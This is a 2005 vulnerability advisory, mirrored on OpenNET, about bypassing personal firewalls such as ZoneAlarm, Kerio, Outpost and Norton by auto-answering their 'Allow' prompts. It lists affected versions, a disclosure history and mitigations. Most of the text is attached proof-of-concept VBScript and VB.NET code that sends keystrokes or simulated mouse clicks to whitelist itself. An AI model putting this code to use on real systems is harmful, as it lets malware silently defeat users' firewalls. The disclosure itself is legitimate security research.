The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Multiple Firewall Products Bypass Vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 3 Jan 2005 22:09:38 +0200
From: Ferruh Mavituna <ferruh@mavituna.com.>
To: [email protected]
Subject: Multiple Firewall Products Bypass Vulnerability

This is a multi-part message in MIME format.

------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        charset="us-ascii"
Content-Transfer-Encoding: 7bit

-------------------------------------------------------------------
Multiple Firewall Products Bypass Vulnerability 
-------------------------------------------------------------------
Online URL		: http://ferruh.mavituna.com/article/?769
Download POC	: http://ferruh.mavituna.com/opensource/firewallbypass.zip
(Also I attached vbs files as txt, one of them is -mousecontrol.txt- vb.net
source code)

This is a generic problem of common Personal Firewall products which are
accept shortcuts or provide an interface that enables to click without
require a password for controlled actions (acting as server -listening
ports-, executing another program, connecting to another computer etc.).

-------------------------------------------------------------------
Problem;
-------------------------------------------------------------------
Most of personal firewalls allow shortcuts or interface for controlling
traffic. It's simple to bypass these firewalls by a multithreaded program
and sending keys or by contolling mouse.

This flaw enables that any Trojan or similar programs can easily bypass
firewall and act as a server or access to another computer. Also most of
these firewalls have a "remember" option so if you bypass firewall and
successfully exploit it, firewall will never ask again.

This is a similar threat with shattering attacks, but different method and
impact.

Vulnerable Products (Sending Key Method and Mouse Control);
These products are vulnerable to both of "Sending Key Method" and "Mouse
Control Method" 

Test Platforms;
Fully Patched Windows XP Professional and Windows 2003 Enterprise Edition
(May 19, 2004 - 01.01.2005)

1.	ZoneAlarm / ZoneAlarm Pro (www.zonelabs.com) | Fixed
        I.	4.5.530.000	- Tested
        II.	4.5.538.001	- Tested
        III.	5 and newer versions are not vulnerable...

2.	Kerio (www.kerio.com)
        I.	4.0.14		- Tested
        II.	All Versions

3.	Agnitium Outpost Firewall (www.agnitium.com)
        I.	2.1.303.4009 (314)	- Tested
        II.	2.5.369.4608 (369)	- Tested
        II.	All Versions

4.	Kaspersky Anti-Hacker (www.kaspersky.com) 
        I.	1.5.119.0	- Tested
        II.	All Versions

5.	Look 'n' Stop (www.looknstop.com)
        I.	2.04p2		- Tested
        II.	All Versions

6.	Symantec's Norton Personal Firewall (www.norton.com)
        I.	2004		- Tested
        II.	All Versions

-------------------------------------------------------------------
Vulnerable Products (Mouse Control);
-------------------------------------------------------------------
These products are only vulnerable to "Mouse Control Method", because they
don't accept shortcuts but still vulnerable to "Mouse Control" attacks.

1.	Panda Platinum Internet Security
        I.	8.03 (tested)
        II.	All Versions

2.	Omniquad Personal Firewall
        I.	1.1 (tested)
        II.	All Versions


-------------------------------------------------------------------
Proof of Concept;
-------------------------------------------------------------------
2 Proof of Concepts attached to advisory (also some other POCs for some
firewalls)

First POC (bypassSendKey.vbs) written in VBScript (.vbs), This POC include
required samples for ZoneAlarm, Kerio, Agnitium, Kaspersky Anti-Hacker, Look
'n' Stop and Symantec's Norton Personal Firewall. This script is executing
an instance of itself for multithreading and send shortcuts to firewall
while first instance trying to connect internet. I didn't write an auto
determine firewall function (but it's so easy), so you need to set it by
yourself.

Second (bypassMouseControl.txt) simulates an example of bypassing Zone Alarm
Firewall by with mouse control, code in VB.NET. Program is not using a real
multithread because some firewalls interrupt executing of program directly.
So program is executing another instance of itself with an argument.

Both of them add themselves to secure app list of firewalls and then bypass
active firewall.

Also I attached testFirewall.vbs for testing your firewall for application
control. 

-------------------------------------------------------------------
Solution;
-------------------------------------------------------------------
All firewalls should ask password for all kind of "Allow" actions. In fact
passwords can be fooled because of its nature but it is the best user
friendly / secure solution for protection.

As a user of these firewalls, if your firewall supports to "deny all
default" option, enable it, so your firewall deny all connections by
default. After that you may can manually select programs for allow them.

-------------------------------------------------------------------
Final Words;
-------------------------------------------------------------------
This is a methodology for bypassing interacted firewalls so it's possible
that this advisory affects other firewalls in market. Also it's possible
that future firewalls will be affected too. I think for now this is a
serious problem for firewalls, until they imply password/random human need
text method for "Allow/Deny" actions.

-------------------------------------------------------------------
History;
-------------------------------------------------------------------
Discovered: 03.05.2004
Vendors Informed: 28.08.2004
Published: 03.01.2005

-------------------------------------------------------------------
Vendors Status;
-------------------------------------------------------------------
Special thanks to ZoneLabs Team.


Ferruh Mavituna
http://ferruh.mavituna.com
pgpkey : http://ferruh.mavituna.com/PGPKey.asc


------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="outpost.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="outpost.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and =
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh Mavituna
        'Const DELAY =3D 1000
        'Const TIMES =3D 1
        'Const EXTRADELAY =3D 0

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY =3D 1000
Const TIMES =3D 1
Const EXTRADELAY =3D 0

appName =3D Wscript.ScriptName

'SendKey
sendkeyMod =3D False
argLen =3D WScript.Arguments.Length
If argLen>0 Then sendkeyMod =3D True=20

Set shell =3D WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
=09
        'First Sleep for a while
        If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

        'Force
        While i<TIMES
        i=3Di+1
        WScript.Sleep DELAY
        '1) First add it  trusted
        shell.sendKeys "+{TAB}" 'Go back once
        shell.sendKeys "{UP 2}" 'Go Up

        '1) Press Enter
        shell.sendKeys "{ENTER}" 'Enter
        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission =
Accomplished..."

Set shell =3D Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect =3D web.getAllResponseHeaders
        Set web =3D Nothing
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="anti-hacker.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="anti-hacker.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'HISTORY
        '3/5/2004
        'Added ZA

        '5/5/2004
        'Added Kerio, Outpost

        '6/5/2004
        'Added Kaspersky Anti-Hacker=20
'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY =3D 0
Const DETERMINEFIREWALL =3D FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
        '// Firewalls
        'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)
        Const ZoneAlarm =3D 0
=09
        'Kerio 4.0.14
        Const Kerio =3D 1

        'Agnitium Outpost Firewall 2.1.303.4009 (314)
        Const Outpost =3D 2

        'Kaspersky Anti-Hacker 1.5.119.0
        Const Kaspersky =3D 3

        'Select Active Firewall
        intFirewall =3D Kaspersky

        '// Configuration
        'Kaspersky Anti-Hacker=20
        arrDelays(Kaspersky,0) =3D 1000
        arrDelays(Kaspersky,1) =3D 1

        'Define Keys for Firewalls
        arrKeys(Kaspersky,0) =3D "{ENTER}"



If DETERMINEFIREWALL Then
        'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName =3D Wscript.ScriptName

'SendKey
sendkeyMod =3D False
argLen =3D WScript.Arguments.Length
If argLen>0 Then sendkeyMod =3D True=20

Set shell =3D WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
=09
        'First Sleep for a while
        If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

        'Force
        While i<arrDelays(intFirewall,1)
        i=3Di+1
        WScript.Sleep arrDelays(intFirewall,0)
        =09
        'Send Keys
        For j=3D0 To Ubound(arrKeys,2)
        If arrKeys(intFirewall,j)<>"" Then=20
        shell.sendKeys arrKeys(intFirewall,j)
        End If
        Next

        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission =
Accomplished..."

Set shell =3D Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect =3D web.getAllResponseHeaders
        Set web =3D Nothing
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="ZoneAlarm.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="ZoneAlarm.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and =
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY =3D 10
Const TIMES =3D 15

'SendKey
sendkeyMod =3D False
argLen =3D WScript.Arguments.Length
If argLen>0 Then sendkeyMod =3D True=20

Set shell =3D WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        While i<TIMES
        i=3Di+1
        WScript.Sleep DELAY
        shell.sendKeys "%R" 'Remember, Do not ask again !
        shell.sendKeys "%Y" 'Click Yes
        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission =
Accomplished..."

Set shell =3D Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect =3D web.getAllResponseHeaders
        Set web =3D Nothing
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="testFirewall.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="testFirewall.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and =
multithreading
'// Simple Firewall Test File
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim shell, sendKeyMod, Result
Const URL =3D "http://ferruh.mavituna.com"

'Connect
Wscript.Echo "Now I'll try to connect to " & URL

If connect(URL,Result) Then
        Wscript.Echo "Mission Accomplished..., Here is the headers;" & =
vbNewline & Result
Else
        Wscript.Echo "OK, I couldn't access to Internet"
End If

Set shell =3D Nothing
Wscript.Quit 1

Function connect(ByVal URL, ByRef Result)
        connect =3D True
        On Error Resume Next
        =09
        ERR.Clear
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        Result =3D web.getAllResponseHeaders
        Set web =3D Nothing

        If ERR<>0 Then connect =3D False
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="norton.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="norton.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and =
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY =3D 10
Const TIMES =3D 15

'SendKey
sendkeyMod =3D False
argLen =3D WScript.Arguments.Length
If argLen>0 Then sendkeyMod =3D True=20

Set shell =3D WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        While i<TIMES
        i=3Di+1
        WScript.Sleep DELAY
        shell.sendKeys "%A" 'Remember, Do not ask again !
        shell.sendKeys "%O" 'Click Yes
        Wend
        'Customized for norton fw by Oezguer Mavituna
        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission =
Accomplished..."

Set shell =3D Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect =3D web.getAllResponseHeaders
        Set web =3D Nothing
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="mousecontrol.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="mousecontrol.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 5/19/2004
'// Simple POC for Bypassing multiple firewall products
'// Code : VB.NET
'***********************************************************

Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, =
ByVal dx As Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal =
dwExtraInfo As Long)
        Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)


        Private Const MOUSEEVENTF_LEFTDOWN =3D &H2
        Private Const MOUSEEVENTF_LEFTUP =3D &H4
        Private Const MOUSEEVENTF_MIDDLEDOWN =3D &H20
        Private Const MOUSEEVENTF_MIDDLEUP =3D &H40
        Private Const MOUSEEVENTF_RIGHTDOWN =3D &H8
        Private Const MOUSEEVENTF_RIGHTUP =3D &H10

        Private Const sleepTime =3D 0.5	'As Second
        Private Const slowMotion =3D True	'Debug !

        'Firewalls
        Const ZoneAlarm As Integer =3D 0

        'Set Points
        Dim arrFirewalls(1, 3) As Integer
        Dim activeFirewall As Integer =3D ZoneAlarm

        Private Sub setupFirewalls()
        'Get Current Screen
        'This is just POC, Real World Example should automaticly detect =
installed firewall, change sleep times, car about exact positoin, =
taskbar position etc. But It's easy to write a real world example
        Dim screenY As Integer =3D Screen.PrimaryScreen.Bounds.Height
        Dim screenX As Integer =3D Screen.PrimaryScreen.Bounds.Width

        arrFirewalls(ZoneAlarm, 0) =3D screenX - 250		'X Remember !
        arrFirewalls(ZoneAlarm, 1) =3D screenY - 130		 'Y

        arrFirewalls(ZoneAlarm, 2) =3D screenX - 190		 ' Yes
        arrFirewalls(ZoneAlarm, 3) =3D screenY - 93

        End Sub

        Private Sub frmFirewallTest_Load(ByVal sender As System.Object, ByVal e =
As System.EventArgs) Handles MyBase.Load

        'Hide  App
        Me.ShowInTaskbar =3D False
        Me.Visible =3D False

        'Args
        Dim flagArg As String =3D Application.ExecutablePath

        If Environment.GetCommandLineArgs().Length > 1 Then

        'Sleep;
        Sleep(sleepTime * 1000)

        'Try;
        setupFirewalls()

        If slowMotion Then Sleep(1000)

        'First Access
        bypassFirewall(arrFirewalls(activeFirewall, 0), =
arrFirewalls(activeFirewall, 1))

        If slowMotion Then Sleep(1000)
        bypassFirewall(arrFirewalls(activeFirewall, 2), =
arrFirewalls(activeFirewall, 3))

        'Gain Access for HTTP
        Sleep(300)

        If slowMotion Then Sleep(1000)
        bypassFirewall(arrFirewalls(activeFirewall, 0), =
arrFirewalls(activeFirewall, 1))

        If slowMotion Then Sleep(1000)
        bypassFirewall(arrFirewalls(activeFirewall, 2), =
arrFirewalls(activeFirewall, 3))

        'Quit !
        Me.Dispose()
        Else

        System.Diagnostics.Process.Start(flagArg, "skipme")

        'Access Internet
        If downloadURL() Then
        MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall =
ByPassed !", MessageBoxButtons.OK, MessageBoxIcon.Warning)

        End If

        Me.Dispose()
        End If

        End Sub

        'Bypas POC
        Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
        'Save Old Positions for return !
        Dim oldX As Integer =3D Cursor.Position.X
        Dim oldY As Integer =3D Cursor.Position.Y

        'Set New Position
        Cursor.Position =3D New Point(X, Y)

        'Click
        mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
        mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)

        'Return=20
        Cursor.Position =3D New Point(oldX, oldY)

        End Sub

        'Connect Internet
        Private Function downloadURL() As Boolean
        downloadURL =3D True
        Try
        Dim wc As New System.Net.WebClient()
        wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")
        Catch
        MessageBox.Show("Can not connected !", "Not Connected !", =
MessageBoxButtons.OK, MessageBoxIcon.Error)
        downloadURL =3D False
        End Try
        End Function


------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="bypassSendKey.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="bypassSendKey.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'***********************************************************
'HISTORY
        '3/5/2004
        'Added ZA

        '5/5/2004
        'Added Kerio, Outpost

        '6/5/2004
        'Added Kaspersky Anti-Hacker=20
=09
        '5/9/2004
        'LooknStop

        '5/20/2004
        'Norton
'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY =3D 0
Const DETERMINEFIREWALL =3D FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
        '// Firewalls
        'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | =
www.zonelabs.com
        Const ZoneAlarm =3D 0
=09
        'Kerio 4.0.14
        Const Kerio =3D 1

        'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
        Const Outpost =3D 2

        'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
        Const Kaspersky =3D 3

        'Look 'n' Stop 2.04p2 | www.looknstop.com
        Const LooknStop =3D 4

        'Norton | www.norton.com
        Const Norton =3D 5

        'Select Active Firewall
        intFirewall =3D ZoneAlarm


        '// Configuration
        'Define Keys, Delays, Repeat Times for Firewalls
=09
        'Kaspersky Anti-Hacker=20
        arrDelays(Kaspersky,0) =3D 400
        arrDelays(Kaspersky,1) =3D 2

        arrKeys(Kaspersky,0) =3D "{ENTER}" 'Just say OK

        'ZoneAlarm
        arrDelays(ZoneAlarm,0) =3D 10
        arrDelays(ZoneAlarm,1) =3D 15

        arrKeys(ZoneAlarm,0) =3D "%R" 'Select Remember
        arrKeys(ZoneAlarm,1) =3D "%Y" 'Yes

        'Outpost
        arrDelays(Outpost,0) =3D 1000
        arrDelays(Outpost,1) =3D 1

        arrKeys(Outpost,0) =3D "+{TAB}" 'Go back once
        arrKeys(Outpost,1) =3D "{UP 2}" 'Go Up
        arrKeys(Outpost,1) =3D "{ENTER}" 'Enter

        'Kerio
        arrDelays(Kerio,0) =3D 100
        arrDelays(Kerio,1) =3D 10

        arrKeys(Kerio,0) =3D " " ' Space - Remember, Do not ask again !
        arrKeys(Kerio,1) =3D "%P" ' Yes

        'LookNStop
        arrDelays(LooknStop,0) =3D 1000
        arrDelays(LooknStop,1) =3D 1

        arrKeys(LooknStop,0) =3D "(%+{TAB})" ' Authorize
        arrKeys(LooknStop,1) =3D "{LEFT}" ' Left
        arrKeys(LooknStop, 2) =3D " " ' Space

        'Norton
        arrDelays(Norton,0) =3D 100
        arrDelays(Norton,1) =3D 5

        arrKeys(Norton,0) =3D "%A" ' Allow
        arrKeys(Norton,1) =3D "%O" ' OK


If DETERMINEFIREWALL Then
        'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName =3D Wscript.ScriptName

'SendKey
sendkeyMod =3D False
argLen =3D WScript.Arguments.Length
If argLen>0 Then sendkeyMod =3D True=20

Set shell =3D WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
=09
        'First Sleep for a while
        If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

        'Force
        While i<arrDelays(intFirewall,1)
        i=3Di+1
        WScript.Sleep arrDelays(intFirewall,0)
        =09
        'Send Keys
        For j=3D0 To Ubound(arrKeys,2)
        If arrKeys(intFirewall,j)<>"" Then=20
        shell.sendKeys arrKeys(intFirewall,j)
        End If
        Next

        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission =
Accomplished..."

Set shell =3D Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect =3D web.getAllResponseHeaders
        Set web =3D Nothing
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0
Content-Type: text/plain;
        name="Kerio.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="Kerio.txt"

'***********************************************************
'// By Ferruh Mavituna=20
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and =
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Kerio 4.0.14
'5/5/2004
'Ferruh Mavituna
        'Const DELAY =3D 100
        'Const TIMES =3D 10
'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY =3D 100
Const TIMES =3D 10

appName =3D Wscript.ScriptName

'SendKey
sendkeyMod =3D False
argLen =3D WScript.Arguments.Length
If argLen>0 Then sendkeyMod =3D True=20

Set shell =3D WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
        While i<TIMES
        i=3Di+1
        WScript.Sleep DELAY
        shell.sendKeys " " 'Remember, Do not ask again !
        shell.sendKeys "%P" 'Click Yes
        Wend

        'Exit
        'Wscript.Echo "Exit !"
        Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission =
Accomplished..."

Set shell =3D Nothing
Wscript.Quit 1


Function connect(ByVal URL)
        Dim web
        Set web =3D CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        connect =3D web.getAllResponseHeaders
        Set web =3D Nothing
End Function
------=_NextPart_000_0292_01C4F1E0.EBCFF7E0--


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру